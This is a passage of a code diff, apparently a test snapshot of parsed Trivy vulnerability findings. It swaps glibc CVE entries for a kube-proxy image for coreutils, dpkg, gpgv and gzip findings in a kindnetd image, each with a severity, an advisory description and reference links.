"type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/URXOIA2LDUKHQXK4BE55BQBRI6ZZG3Y6/", + "value": "https://security-tracker.debian.org/tracker/CVE-2011-3374", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-6096", + "value": "https://snyk.io/vuln/SNYK-LINUX-APT-116518", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202101-20", + "value": "https://ubuntu.com/security/CVE-2011-3374", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-0563", + "installedVersion": "1:2.36.1-8+deb11u1", + "packageName": "bsdutils", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-0563", + "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + "https://security.netapp.com/advisory/ntap-20220331-0002/", + "https://www.cve.org/CVERecord?id=CVE-2022-0563", + ], + }, + "category": "Vulnerability", + "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", + "references": [ { "type": "URL", - "value": "https://sourceware.org/bugzilla/attachment.cgi?id=12334", + "value": "https://avd.aquasec.com/nvd/cve-2022-0563", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25620", + "value": "https://access.redhat.com/security/cve/CVE-2022-0563", }, { "type": "URL", - "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1019", + "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4954-1", + "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-6096", + "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", }, { "type": "URL", - "value": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1019", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-0563", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-3326", - "installedVersion": "2.28-10", - "packageName": "libc6", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2016-2781", + "installedVersion": "8.32-4+b1", + "packageName": "coreutils", "references": [ - "http://www.openwall.com/lists/oss-security/2021/01/28/2", - "https://access.redhat.com/security/cve/CVE-2021-3326", - "https://bugs.chromium.org/p/project-zero/issues/detail?id=2146", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3326", - "https://linux.oracle.com/cve/CVE-2021-3326.html", - "https://linux.oracle.com/errata/ELSA-2021-9344.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3326", - "https://security.gentoo.org/glsa/202107-07", - "https://security.netapp.com/advisory/ntap-20210304-0007/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=27256", - "https://sourceware.org/git/?p=glibc.git;a=commit;h=7d88c6142c6efc160c0ee5e4f85cde382c072888", - "https://sourceware.org/pipermail/libc-alpha/2021-January/122058.html", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5699-1", - "https://www.cve.org/CVERecord?id=CVE-2021-3326", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujan2022.html", + "http://seclists.org/oss-sec/2016/q1/452", + "http://www.openwall.com/lists/oss-security/2016/02/28/2", + "http://www.openwall.com/lists/oss-security/2016/02/28/3", + "https://access.redhat.com/security/cve/CVE-2016-2781", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2781", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://lore.kernel.org/patchwork/patch/793178/", + "https://nvd.nist.gov/vuln/detail/CVE-2016-2781", + "https://www.cve.org/CVERecord?id=CVE-2016-2781", ], }, "category": "Vulnerability", - "description": "The iconv function in the GNU C Library (aka glibc or libc6) 2.32 and earlier, when processing invalid input sequences in the ISO-2022-JP-3 encoding, fails an assertion in the code path and aborts the program, potentially resulting in a denial of service.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "chroot in GNU coreutils, when used with --userspec, allows local users to escape to the parent session via a crafted TIOCSTI ioctl call, which pushes characters to the terminal's input buffer.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "glibc: Assertion failure in ISO-2022-JP-3 gconv module related to combining characters", + "name": "coreutils: Non-privileged session can escape to the parent session in chroot", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3326", + "value": "https://avd.aquasec.com/nvd/cve-2016-2781", + }, + { + "type": "URL", + "value": "http://seclists.org/oss-sec/2016/q1/452", + }, + { + "type": "URL", + "value": "http://www.openwall.com/lists/oss-security/2016/02/28/2", + }, + { + "type": "URL", + "value": "http://www.openwall.com/lists/oss-security/2016/02/28/3", + }, + { + "type": "URL", + "value": "https://access.redhat.com/security/cve/CVE-2016-2781", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2781", + }, + { + "type": "URL", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/01/28/2", + "value": "https://lore.kernel.org/patchwork/patch/793178/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3326", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2016-2781", }, { "type": "URL", - "value": "https://bugs.chromium.org/p/project-zero/issues/detail?id=2146", + "value": "https://www.cve.org/CVERecord?id=CVE-2016-2781", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2017-18018", + "installedVersion": "8.32-4+b1", + "packageName": "coreutils", + "references": [ + "http://lists.gnu.org/archive/html/coreutils/2017-12/msg00045.html", + "https://access.redhat.com/security/cve/CVE-2017-18018", + "https://nvd.nist.gov/vuln/detail/CVE-2017-18018", + "https://www.cve.org/CVERecord?id=CVE-2017-18018", + ], + }, + "category": "Vulnerability", + "description": "In GNU Coreutils through 8.29, chown-core.c in chown and chgrp does not prevent replacement of a plain file with a symlink during use of the POSIX "-R -L" options, which allows local users to modify the ownership of arbitrary files by leveraging a race condition.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "coreutils: race condition vulnerability in chown and chgrp", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3326", + "value": "https://avd.aquasec.com/nvd/cve-2017-18018", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-3326.html", + "value": "http://lists.gnu.org/archive/html/coreutils/2017-12/msg00045.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "value": "https://access.redhat.com/security/cve/CVE-2017-18018", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-18018", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3326", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-18018", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "1.20.10", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-1664", + "installedVersion": "1.20.9", + "packageName": "dpkg", + "references": [ + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1664", + "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=1f23dddc17f69c9598477098c7fb9936e15fa495", + "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=58814cacee39c4ce9e2cd0e3a3b9b57ad437eff5", + "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=7a6c03cb34d4a09f35df2f10779cbf1b70a5200b", + "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=faa4c92debe45412bfcf8a44f26e827800bb24be", + "https://lists.debian.org/debian-lts-announce/2022/05/msg00033.html", + "https://lists.debian.org/debian-security-announce/2022/msg00115.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-1664", + "https://security.netapp.com/advisory/ntap-20221007-0002/", + "https://ubuntu.com/security/notices/USN-5446-1", + "https://ubuntu.com/security/notices/USN-5446-2", + ], + }, + "category": "Vulnerability", + "description": "Dpkg::Source::Archive in dpkg, the Debian package management system, before version 1.21.8, 1.20.10, 1.19.8, 1.18.26 is prone to a directory traversal vulnerability. When extracting untrusted source packages in v2 and v3 source package formats that include a debian.tar, the in-place extraction can lead to directory traversal situations on specially crafted orig.tar and debian.tar tarballs.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "Dpkg::Source::Archive in dpkg, the Debian package management system, b ...", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2022-1664", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-07", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1664", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210304-0007/", + "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=1f23dddc17f69c9598477098c7fb9936e15fa495", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27256", + "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=58814cacee39c4ce9e2cd0e3a3b9b57ad437eff5", }, { "type": "URL", - "value": "https://sourceware.org/git/?p=glibc.git;a=commit;h=7d88c6142c6efc160c0ee5e4f85cde382c072888", + "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=7a6c03cb34d4a09f35df2f10779cbf1b70a5200b", }, { "type": "URL", - "value": "https://sourceware.org/pipermail/libc-alpha/2021-January/122058.html", + "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=faa4c92debe45412bfcf8a44f26e827800bb24be", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://lists.debian.org/debian-lts-announce/2022/05/msg00033.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5699-1", + "value": "https://lists.debian.org/debian-security-announce/2022/msg00115.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3326", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1664", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://security.netapp.com/advisory/ntap-20221007-0002/", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2022.html", + "value": "https://ubuntu.com/security/notices/USN-5446-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5446-2", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-3999", - "installedVersion": "2.28-10", - "packageName": "libc6", + "fixedVersion": "2.2.27-2+deb11u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-34903", + "installedVersion": "2.2.27-2+deb11u1", + "packageName": "gpgv", "references": [ - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", - "https://access.redhat.com/security/cve/CVE-2021-3999", - "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", - "https://linux.oracle.com/cve/CVE-2021-3999.html", - "https://linux.oracle.com/errata/ELSA-2022-9234.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", - "https://security-tracker.debian.org/tracker/CVE-2021-3999", - "https://security.netapp.com/advisory/ntap-20221104-0001/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", - "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5310-2", - "https://www.cve.org/CVERecord?id=CVE-2021-3999", - "https://www.openwall.com/lists/oss-security/2022/01/24/4", + "http://www.openwall.com/lists/oss-security/2022/07/02/1", + "https://access.redhat.com/errata/RHSA-2022:6602", + "https://access.redhat.com/security/cve/CVE-2022-34903", + "https://bugs.debian.org/1014157", + "https://bugzilla.redhat.com/2102868", + "https://bugzilla.redhat.com/show_bug.cgi?id=2102868", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34903", + "https://dev.gnupg.org/T6027", + "https://errata.almalinux.org/9/ALSA-2022-6602.html", + "https://errata.rockylinux.org/RLSA-2022:6602", + "https://linux.oracle.com/cve/CVE-2022-34903.html", + "https://linux.oracle.com/errata/ELSA-2022-6602.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FRLWJQ76A4UKHI3Q36BKSJKS4LFLQO33/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NPTAR76EIZY7NQFENSOZO7U473257OVZ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VN63GBTMRWO36Y7BKA2WQHROAKCXKCBL/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU64FUVG2PRZBSHFOQRSP7KDVEIZ23OS/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-34903", + "https://security.netapp.com/advisory/ntap-20220826-0005/", + "https://ubuntu.com/security/notices/USN-5503-1", + "https://ubuntu.com/security/notices/USN-5503-2", + "https://www.cve.org/CVERecord?id=CVE-2022-34903", + "https://www.debian.org/security/2022/dsa-5174", + "https://www.openwall.com/lists/oss-security/2022/06/30/1", ], }, "category": "Vulnerability", - "description": "A flaw was found in glibc. An off-by-one buffer overflow and underflow in getcwd() may lead to memory corruption when the size of the buffer is exactly 1. A local attacker who can control the input buffer and size passed to getcwd() in a setuid program could use this flaw to potentially execute arbitrary code and escalate their privileges on the system.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "GnuPG through 2.3.6, in unusual situations where an attacker possesses any secret-key information from a victim's keyring and other constraints (e.g., use of GPGME) are met, allows signature forgery via injection into the status line.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "glibc: Off-by-one buffer overflow/underflow in getcwd()", + "name": "Signature spoofing via status line injection", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3999", - }, - { - "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", + "value": "https://avd.aquasec.com/nvd/cve-2022-34903", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3999", + "value": "http://www.openwall.com/lists/oss-security/2022/07/02/1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", + "value": "https://access.redhat.com/errata/RHSA-2022:6602", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", + "value": "https://access.redhat.com/security/cve/CVE-2022-34903", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-3999.html", + "value": "https://bugs.debian.org/1014157", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9234.html", + "value": "https://bugzilla.redhat.com/2102868", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2102868", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34903", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2021-3999", + "value": "https://dev.gnupg.org/T6027", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221104-0001/", + "value": "https://errata.almalinux.org/9/ALSA-2022-6602.html", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", + "value": "https://errata.rockylinux.org/RLSA-2022:6602", }, { "type": "URL", - "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", + "value": "https://linux.oracle.com/cve/CVE-2022-34903.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://linux.oracle.com/errata/ELSA-2022-6602.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-2", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FRLWJQ76A4UKHI3Q36BKSJKS4LFLQO33/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3999", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NPTAR76EIZY7NQFENSOZO7U473257OVZ/", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/01/24/4", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VN63GBTMRWO36Y7BKA2WQHROAKCXKCBL/", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2016-10228", - "installedVersion": "2.28-10", - "packageName": "libc6", - "references": [ - "http://openwall.com/lists/oss-security/2017/03/01/10", - "http://www.securityfocus.com/bid/96525", - "https://access.redhat.com/security/cve/CVE-2016-10228", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10228", - "https://linux.oracle.com/cve/CVE-2016-10228.html", - "https://linux.oracle.com/errata/ELSA-2021-9344.html", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2016-10228", - "https://security.gentoo.org/glsa/202101-20", - "https://sourceware.org/bugzilla/show_bug.cgi?id=19519", - "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", - "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5768-1", - "https://www.cve.org/CVERecord?id=CVE-2016-10228", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - ], - }, - "category": "Vulnerability", - "description": "The iconv program in the GNU C Library (aka glibc or libc6) 2.31 and earlier, when invoked with multiple suffixes in the destination encoding (TRANSLATE or IGNORE) along with the -c option, enters an infinite loop when processing invalid multi-byte input sequences, leading to a denial of service.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "glibc: iconv program can hang when invoked with the -c option", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2016-10228", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU64FUVG2PRZBSHFOQRSP7KDVEIZ23OS/", }, { "type": "URL", - "value": "http://openwall.com/lists/oss-security/2017/03/01/10", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-34903", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/96525", + "value": "https://security.netapp.com/advisory/ntap-20220826-0005/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2016-10228", + "value": "https://ubuntu.com/security/notices/USN-5503-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10228", + "value": "https://ubuntu.com/security/notices/USN-5503-2", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2016-10228.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-34903", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "value": "https://www.debian.org/security/2022/dsa-5174", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://www.openwall.com/lists/oss-security/2022/06/30/1", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-3219", + "installedVersion": "2.2.27-2+deb11u1", + "packageName": "gpgv", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-3219", + "https://bugzilla.redhat.com/show_bug.cgi?id=2127010", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3219", + "https://dev.gnupg.org/D556", + "https://dev.gnupg.org/T5993", + "https://marc.info/?l=oss-security&m=165696590211434&w=4", + "https://nvd.nist.gov/vuln/detail/CVE-2022-3219", + "https://security.netapp.com/advisory/ntap-20230324-0001/", + "https://www.cve.org/CVERecord?id=CVE-2022-3219", + ], + }, + "category": "Vulnerability", + "description": "GnuPG can be made to spin on a relatively small input by (for example) crafting a public key with thousands of signatures attached, compressed down to just a few KB.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "denial of service issue (resource consumption) using compressed packets", + "references": [ { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://avd.aquasec.com/nvd/cve-2022-3219", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2016-10228", + "value": "https://access.redhat.com/security/cve/CVE-2022-3219", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202101-20", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2127010", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=19519", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3219", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", + "value": "https://dev.gnupg.org/D556", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", + "value": "https://dev.gnupg.org/T5993", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://marc.info/?l=oss-security&m=165696590211434&w=4", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5768-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3219", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2016-10228", + "value": "https://security.netapp.com/advisory/ntap-20230324-0001/", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-3219", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-25013", - "installedVersion": "2.28-10", - "packageName": "libc6", + "fixedVersion": "1.10-4+deb11u1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-1271", + "installedVersion": "1.10-4", + "packageName": "gzip", "references": [ - "https://access.redhat.com/security/cve/CVE-2019-25013", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-25013", - "https://linux.oracle.com/cve/CVE-2019-25013.html", - "https://linux.oracle.com/errata/ELSA-2021-9344.html", - "https://lists.apache.org/thread.html/r32d767ac804e9b8aad4355bb85960a6a1385eab7afff549a5e98660f@%3Cjira.kafka.apache.org%3E", - "https://lists.apache.org/thread.html/r448bb851cc8e6e3f93f3c28c70032b37062625d81214744474ac49e7@%3Cdev.kafka.apache.org%3E", - "https://lists.apache.org/thread.html/r4806a391091e082bdea17266452ca656ebc176e51bb3932733b3a0a2@%3Cjira.kafka.apache.org%3E", - "https://lists.apache.org/thread.html/r499e4f96d0b5109ef083f2feccd33c51650c1b7d7068aa3bd47efca9@%3Cjira.kafka.apache.org%3E", - "https://lists.apache.org/thread.html/r5af4430421bb6f9973294691a7904bbd260937e9eef96b20556f43ff@%3Cjira.kafka.apache.org%3E", - "https://lists.apache.org/thread.html/r750eee18542bc02bd8350861c424ee60a9b9b225568fa09436a37ece@%3Cissues.zookeeper.apache.org%3E", - "https://lists.apache.org/thread.html/r7a2e94adfe0a2f0a1d42e4927e8c32ecac97d37db9cb68095fe9ddbc@%3Cdev.zookeeper.apache.org%3E", - "https://lists.apache.org/thread.html/rd2354f9ccce41e494fbadcbc5ad87218de6ec0fff8a7b54c8462226c@%3Cissues.zookeeper.apache.org%3E", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4Y6TX47P47KABSFOL26FLDNVCWXDKDEZ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TVCUNLQ3HXGS4VPUQKWTJGRAW2KTFGXS/", - "https://nvd.nist.gov/vuln/detail/CVE-2019-25013", - "https://security.gentoo.org/glsa/202107-07", - "https://security.netapp.com/advisory/ntap-20210205-0004/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=24973", - "https://sourceware.org/git/?p=glibc.git;a=commit;h=ee7a3144c9922808181009b7b3e50e852fb4999b", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5768-1", - "https://www.cve.org/CVERecord?id=CVE-2019-25013", - "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://access.redhat.com/errata/RHSA-2022:4940", + "https://access.redhat.com/security/cve/CVE-2022-1271", + "https://bugzilla.redhat.com/2073310", + "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", + "https://errata.almalinux.org/9/ALSA-2022-4940.html", + "https://errata.rockylinux.org/RLSA-2022:4940", + "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", + "https://linux.oracle.com/cve/CVE-2022-1271.html", + "https://linux.oracle.com/errata/ELSA-2022-5052.html", + "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", + "https://security-tracker.debian.org/tracker/CVE-2022-1271", + "https://security.gentoo.org/glsa/202209-01", + "https://security.netapp.com/advisory/ntap-20220930-0006/", + "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", + "https://ubuntu.com/security/notices/USN-5378-1", + "https://ubuntu.com/security/notices/USN-5378-2", + "https://ubuntu.com/security/notices/USN-5378-3", + "https://ubuntu.com/security/notices/USN-5378-4", + "https://www.cve.org/CVERecord?id=CVE-2022-1271", + "https://www.openwall.com/lists/oss-security/2022/04/07/8", ], }, "category": "Vulnerability", - "description": "The iconv feature in the GNU C Library (aka glibc or libc6) through 2.32, when processing invalid multi-byte input sequences in the EUC-KR encoding, may have a buffer over-read.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "An arbitrary file write vulnerability was found in GNU gzip's zgrep utility. When zgrep is applied on the attacker's chosen file name (for example, a crafted file name), this can overwrite an attacker's content to an 